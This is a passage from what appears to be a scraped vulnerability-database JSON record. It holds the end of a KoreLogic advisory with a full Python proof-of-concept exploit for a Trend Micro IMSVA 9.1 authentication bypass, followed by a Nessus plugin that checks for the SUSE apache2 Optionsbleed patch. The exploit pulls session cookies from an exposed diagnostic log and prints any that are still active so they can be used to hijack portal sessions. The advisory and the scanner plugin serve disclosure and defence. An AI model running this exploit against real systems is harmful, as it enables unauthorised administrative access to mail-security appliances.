Patches.\r\n 2018.02.08 - KoreLogic public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n#!/usr/bin/python3\r\n\r\n\r\nfrom argparse import ArgumentParser\r\nfrom ssl import _create_unverified_context\r\nfrom time import mktime\r\nfrom urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener\r\n\r\n\r\nbanner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass\r\n{}'''.format('-'*67)\r\n\r\n\r\nclass Exploit:\r\n def __init__(self, args):\r\n self.target_host = args.host\r\n self.target_port = args.port\r\n self.list_all = args.ls\r\n self.sessions = []\r\n self.session_latest_time = None\r\n self.session_latest_id = None\r\n self.sessions_active = []\r\n return None\r\n\r\n def is_target(self):\r\n url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port))\r\n url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port))\r\n if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200:\r\n try:\r\n urlopen(url_loginjsp, context=_create_unverified_context())\r\n except HTTPError as e:\r\n if e.code == 403:\r\n return True\r\n else:\r\n return False\r\n return False\r\n\r\n def get_sessions(self):\r\n url_vulnpage = Request('https://{}:{}/widget/repository/log/diagnostic.log'.format(self.target_host,\r\nself.target_port))\r\n vuln_obj = urlopen(url_vulnpage, context=_create_unverified_context())\r\n if vuln_obj.getcode() == 200:\r\n vuln_pagedata = vuln_obj.read()\r\n for line in vuln_pagedata.decode('utf8').split('\\n'):\r\n if 'product_auth' in line and 'JSEEEIONID' in line:\r\n self.sessions.append((line.split(',')[0], line.split(',')[-1].split(' ')[1].split(':')[1]))\r\n else:\r\n return False\r\n return True\r\n\r\n def find_latest(self):\r\n for session in list(set(self.sessions)):\r\n year, month, day = session[0].split(' ')[0].split('-')\r\n hour, minute, second = session[0].split(' ')[1].split(':')\r\n session_time = mktime((int(year), int(month), int(day), int(hour), int(minute), int(second), 0, 0, 0))\r\n if self.session_latest_time is None:\r\n self.session_latest_time = session_time\r\n if session_time > self.session_latest_time:\r\n self.session_latest_time = session_time\r\n self.session_latest_id = session[1]\r\n if self.list_all:\r\n if self.is_session_alive():\r\n self.sessions_active.append((self.session_latest_time, self.session_latest_id))\r\n return True\r\n\r\n def is_session_alive(self):\r\n url_consolepage = Request('https://{}:{}/console.imss'.format(self.target_host, self.target_port))\r\n opener = build_opener(HTTPSHandler(context=_create_unverified_context()))\r\n opener.addheaders.append(('Cookie', 'JSESSIONID={}'.format(self.session_latest_id)))\r\n console_obj = opener.open(url_consolepage)\r\n if console_obj.getcode() == 200:\r\n console_pagedata = console_obj.read().decode('utf8')\r\n if 'parent.location.href=\"/timeout.imss\"' in console_pagedata:\r\n return False\r\n else:\r\n return False\r\n return True\r\n\r\n def run(self):\r\n if self.is_target():\r\n if self.get_sessions():\r\n print('[-] Leaked {} sessions'.format(len(self.sessions)))\r\n self.find_latest()\r\n if self.list_all and self.sessions_active:\r\n print('[+] Active sessions leaked.')\r\n sessions = []\r\n for entry in list(set(self.sessions_active)):\r\n sessions.append(entry[1])\r\n for session in list(set(sessions)):\r\n print('Set-Cookie: JSESSIONID={}'.format(session))\r\n elif self.is_session_alive():\r\n print('[+] Active session leaked.')\r\n print('Set-Cookie: JSESSIONID={}'.format(self.session_latest_id))\r\n return True\r\n else:\r\n print('[-] {} sessions leaked but none are active.'.format(len(self.sessions)))\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n print(banner)\r\n arg_parser = ArgumentParser(add_help=False)\r\n arg_parser.add_argument('-H', '--help', action='help', help='Help')\r\n arg_parser.add_argument('-h', '--host', default=None, required=True, help='Target host')\r\n arg_parser.add_argument('-p', '--port', default=8445, type=int, help='Target port')\r\n arg_parser.add_argument('-l', '--ls', action='store_true', default=False, help='List all sessions (noisy)')\r\n\r\n args = arg_parser.parse_args()\r\n\r\n Exploit(args).run()\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2018\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29759"}], "nessus": [{"lastseen": "2019-11-03T12:19:19", "bulletinFamily": "scanner", "description": "This update for apache2 fixes one issues. This security issue was\nfixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-2718-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103833", "published": "2017-10-13T00:00:00", "title": "SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2718-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103833);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/09/11 11:22:16\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes one issues. This security issue was\nfixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9798/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172718-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b3bb4ad6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1682=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1682=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1682=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debugsource-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-example-pages-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-debuginfo-2.4.16-20.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
